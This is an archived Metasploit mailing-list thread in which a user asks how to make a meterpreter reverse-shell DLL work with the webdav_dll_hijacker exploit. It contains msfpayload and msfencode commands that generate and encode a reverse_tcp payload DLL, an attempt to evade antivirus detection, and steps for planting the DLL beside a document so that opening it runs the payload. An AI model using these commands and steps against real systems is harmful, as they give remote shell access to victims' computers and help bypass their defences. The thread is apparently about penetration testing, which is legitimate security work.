Metasploit mailing list archives
Re: DLL name for webdav_dll_hijacker exploit
From: anil saini <imanilsaini () gmail com>
Date: Wed, 1 Sep 2010 10:02:25 +0530
I have made a dll using *"./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=5050 D > /temp/rpawinet.dll"* . The dll is working and giving me meterpreter shell. But this dll is caught by almost all anti-virus. I tried encoded this using ./msfencode but then this stoped working. i used "*./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4433 R | ./msfencode -c 13 -e x86/shikata_ga_nai - t dll > /rpawinet.dll* " i converted a encoded test.exe into a rpawinet.dll using following command but that is also not working *./msfpayload CMD=/test.exe D > /rpawinet.dll* What wrong i m doing ? please help. -Anil Saini On Mon, Aug 30, 2010 at 8:07 PM, HD Moore <hdm () metasploit com> wrote:
On 8/29/2010 11:26 PM, anil saini wrote:I m testing *webdav_dll_hijacker i*n metasploit. My exploit is working fine if i use it through net share. But i m facing problems with archives and folders which includes meterpreter payload DLL and file. My test steps are:- 1. Generate meterpreter payload DLL using msfpayload commad. 2. Rename DLL as DLL mentioned in various forums.(for example for ppt 2007 i m using pptimpconv.dll, pp7x32.dll, rpawinet.dll) 3. Put DLL and file.ppt in a folder 4. Open file.ppt from folder Same methodology using vbscript and javascript with their associated DLL types is working.That is the correct way to do it, make sure no background process is running for the affected product. -HD _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- DLL name for webdav_dll_hijacker exploit anil saini (Aug 29)
- Re: DLL name for webdav_dll_hijacker exploit HD Moore (Aug 30)
- Re: DLL name for webdav_dll_hijacker exploit anil saini (Aug 31)
- Re: DLL name for webdav_dll_hijacker exploit HD Moore (Aug 30)